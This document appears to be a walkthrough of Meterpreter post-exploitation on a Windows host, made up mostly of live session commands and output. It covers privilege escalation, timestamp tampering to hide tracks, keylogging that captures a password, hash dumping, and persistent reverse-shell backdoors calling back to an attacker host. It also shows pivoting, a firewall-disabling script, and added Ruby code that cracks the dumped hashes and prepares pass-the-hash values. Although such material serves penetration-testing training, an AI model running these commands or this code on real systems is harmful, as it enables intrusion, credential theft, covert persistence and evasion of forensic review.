Privilege escalation and process migration

meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:
    -t <opt>  The technique to use. (Default to '0').

    0 : All techniques available
    1 : Service - Named Pipe Impersonation (In Memory/Admin)
    2 : Service - Named Pipe Impersonation (Dropper/Admin)
    3 : Service - Token Duplication (In Memory/Admin)
    4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > migrate 2084
[*] Migrating to 2084...
[*] Migration completed successfully.

-----------------------------------------------------------------------
Setting up multiple communication channels with the target

meterpreter > execute -h

Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token

meterpreter > execute -f notepad.exe -c

Process 5708 created.
Channel 1 created.

meterpreter > execute -f cmd.exe -c

Process 4472 created.
Channel 2 created.

meterpreter > execute -f calc.exe -c

Process 6000 created.
Channel 3 created.

meterpreter > write 5

Enter data followed by a '.' on an empty line:

Metasploit!!
.
[*] Wrote 13 bytes to channel 5.

meterpreter > interact 2
Interacting with channel 2...

Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\DARKLORD\Desktop>
------------------------------------------------------------------------

Covering tracks with the timestomp command

meterpreter > timestomp C:\poufne.doc -v

Modified      : 2014-04-25 18:58:24 +0200
Accessed      : 2014-04-25 18:58:24 +0200
Created       : 2014-04-25 18:58:06 +0200
Entry Modified: 2014-04-25 19:01:06 +0200


meterpreter > timestomp C:\poufne.doc -c "3/13/2013 13:13:13"
[*] Setting specific MACE attributes on C:poufne.doc

meterpreter > timestomp C:\poufne.doc -m "3/13/2013 13:13:23"
[*] Setting specific MACE attributes on C:poufne.doc
meterpreter > timestomp C:\poufne.doc -a "3/13/2013 13:13:33"
[*] Setting specific MACE attributes on C:poufne.doc


meterpreter > timestomp C:\poufne.doc -v

Modified      : 2013-03-13 13:13:13 +0200
Accessed      : 2013-03-13 13:13:23 +0200
Created       : 2013-03-13 13:13:33 +0200
Entry Modified: 2013-03-13 13:13:13 +0200

-----------------------------------------------------------------------

The getdesktop command and keystroke capture

meterpreter > enumdesktops

Enumerating all accessible desktops

Desktops
========

    Session  Station   Name
    -------  -------   ----
    0        WinSta0   Default
    0        WinSta0   Disconnect
    0        WinSta0   Winlogon
    0        SAWinSta  SADesktop

meterpreter > getdesktop
Session 0\Service-0x0-3e7$\Default

meterpreter > setdesktop
Changed to desktop WinSta0\Default

meterpreter > getdesktop
Session 0\WinSta0\Default

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...

gmail.com <Return> daklord <Tab> 123123


meterpreter > migrate 1180
[*] Migrating to 1180...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Winlogon

meterpreter > migrate 884
[*] Migrating to 884...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Default
---------------------------------------------------------------

Using the Meterpreter scraper script

meterpreter > run scraper

[*] New session on 192.168.56.1:4232...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\DARKLORD\AppData\Local\Temp\UKWKdpIb.reg)
-------------------------------------------------------------------------

The pass-the-hash technique

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 78e1241e98c23002bc85fd94c146309d...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DARKLORD:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
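The keyscan_dump capture in the keystroke section and the hashdump output above are worth tying together offline before anything is replayed against the host. The Ruby below is an added example, not code from the book or from Metasploit: it parses the hashdump lines, flags the well-known empty-password hashes, verifies candidate passwords against the NT hash with a pure-Ruby MD4 (the NT hash is MD4 of the UTF-16LE password, so this needs no contact with the target), rebuilds the fields the victim typed from the keyscan line and tries each of them against every dumped account, and formats the LM:NT value that exploit/windows/smb/psexec takes as SMBPass. The sample inputs are copied from the listings above; treating `<Back>` as the backspace token and whitespace between tokens as a separator are assumptions of this example.

```ruby
# Added example (not from the book or Metasploit): offline triage of the
# hashdump and keyscan_dump output shown on this page.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee" # LM hash of "": LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0" # MD4(""): the account has no password

# Inputs copied from the sessions above (constructed test data for this example).
HASHDUMP = <<~TXT
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  DARKLORD:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
TXT
KEYSCAN = "gmail.com <Return> daklord <Tab> 123123"

def rotl(x, n)
  ((x << n) | (x >> (32 - n))) & 0xffffffff
end

# Pure-Ruby MD4 (RFC 1320); avoids OpenSSL, which ships MD4 only in its legacy provider.
def md4(data)
  msg = data.b + "\x80".b
  msg << "\x00".b while msg.bytesize % 64 != 56
  msg << [data.bytesize * 8].pack("Q<")
  f = ->(x, y, z) { (x & y) | (~x & z) }
  g = ->(x, y, z) { (x & y) | (x & z) | (y & z) }
  h = ->(x, y, z) { x ^ y ^ z }
  rounds = [
    [f, 0x00000000, [3, 7, 11, 19], (0..15).to_a],
    [g, 0x5a827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]],
    [h, 0x6ed9eba1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]]
  ]
  state = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]
  msg.unpack("V*").each_slice(16) do |x|
    w = state.dup
    rounds.each do |fn, k, shifts, order|
      order.each_with_index do |j, i|
        t = (4 - i % 4) % 4 # the updated register rotates a, d, c, b
        sum = w[t] + fn.call(w[(t + 1) % 4], w[(t + 2) % 4], w[(t + 3) % 4]) + x[j] + k
        w[t] = rotl(sum & 0xffffffff, shifts[i % 4])
      end
    end
    state = state.zip(w).map { |s, v| (s + v) & 0xffffffff }
  end
  state.pack("V4").unpack1("H*")
end

# NT hash = MD4 over the UTF-16LE encoding of the password.
def ntlm_hash(password)
  md4(password.encode("UTF-16LE"))
end

Account = Struct.new(:user, :rid, :lm, :nt)

# One Account per "user:rid:lm:nt:::" line; anything else is skipped.
def parse_hashdump(text)
  text.each_line.map do |line|
    user, rid, lm, nt = line.strip.split(":")
    next unless nt && nt =~ /\A\h{32}\z/
    Account.new(user, rid.to_i, lm.downcase, nt.downcase)
  end.compact
end

def lm_stored?(acct)
  acct.lm != EMPTY_LM
end

def empty_password?(acct)
  acct.nt == EMPTY_NT
end

# First candidate whose NT hash matches, or nil; nothing is sent to the host.
def crack(acct, candidates)
  candidates.find { |pw| ntlm_hash(pw) == acct.nt }
end

# Value for psexec's SMBPass option: "LM:NT", LM half left as the empty value.
def smbpass(acct)
  "#{acct.lm}:#{acct.nt}"
end

# Rebuilds the typed fields from a keyscan_dump line. <Return> and <Tab> start a
# new field; <Back> is assumed to be the backspace token and removes a character;
# any other <...> token and the whitespace between tokens are dropped.
def keyscan_fields(line)
  fields = ["".dup]
  line.scan(/<[^>]+>|[^<\s]+/) do |tok|
    case tok
    when "<Return>", "<Tab>" then fields << "".dup
    when "<Back>" then fields[-1] = fields[-1][0...-1]
    when /\A<.*>\z/ then nil
    else fields[-1] << tok
    end
  end
  fields.reject(&:empty?)
end

# Credential-reuse check: try "" and every keylogged field against each hash.
def reuse_check(hashdump, keyscan)
  typed = keyscan_fields(keyscan)
  parse_hashdump(hashdump).map { |a| [a.user, crack(a, [""] + typed)] }.to_h
end
```

Run as a plain script; it never touches the target. On this host the LM halves are all the empty value, so LM hashes are not stored and only the NT half matters for pass-the-hash. Administrator and Guest carry the empty-password NT hash, but note that Windows by default refuses network logons for accounts with a blank password (the "limit local account use of blank passwords" policy), so psexec against them may still fail; DARKLORD's hash is the one worth passing or cracking, and the keylogged "123123" is the obvious first candidate.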
----------------------------------------------------------------------------------

Establishing a persistent connection with backdoors

meterpreter > run metsvc -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the service
    -h        This help menu
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)


meterpreter > run metsvc -A

[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\DARKLORD\AppData\Local\Temp\ygLFhIFX...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.


meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to..
    -L <opt>  Location in target host where to write payload to..
    -P <opt>  Payload to use, default is    
    -S        Automatically start the agent on boot as a service 
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection 
    -p <opt>  The port on the remote host where Metasploit..
    -r <opt>  The IP of the system running Metasploit listening..


meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.56.101
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKLORD-PC_20111227.0307/DARKLORD-PC_20111227.0307.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4321
[*] Persistent agent script is 610795 bytes long
[+] Persistent Script written to C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[*] Starting connection handler at port 4321 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[+] Agent executed with PID 5712
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[*] Installing as service..
[*] Creating service cpvPbOfXj
------------------------------------------------------------------------------

Pivoting with Meterpreter

meterpreter > run arp_scanner -r 10.0.2.1/24

[*] ARP Scanning 10.0.2.1/24
[*] IP: 10.0.2.7 MAC 8:26:18:41:fb:33
[*] IP: 10.0.2.9 MAC 41:41:41:41:41:41
meterpreter > background
msf  exploit(handler) > route add 10.0.2.15 255.255.255.0 1

[*] Route added

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

--------------------------------------------------------------------------------------

Port forwarding with Meterpreter

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -l 4321 -p 80 -r 10.0.2.7

[*] Local TCP relay created: 0.0.0.0:4321 <-> 10.0.2.7:80
---------------------------------------------------------------------------------------------

Building a Meterpreter script: Windows firewall deactivator

# Windows firewall deactivator

# Parse options and parameters

opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)

opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    print_line "Meterpreter script that disables the default Windows firewall"
    print_line "Hopefully this works"
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}

# Check the operating system and run the command

unsupported if client.platform !~ /win32|win64/i

begin
  print_status("Disabling the default firewall")
  # netsh needs an elevated token (run getsystem first). cmd_exec returns the
  # command's output, which is discarded here, so an elevation error would go
  # unnoticed; confirm with `netsh advfirewall show allprofiles` afterwards.
  cmd_exec('cmd /c', 'netsh advfirewall set AllProfiles state off', 5)
rescue ::Exception => e
  print_error("Failed to disable the firewall: #{e}")
end



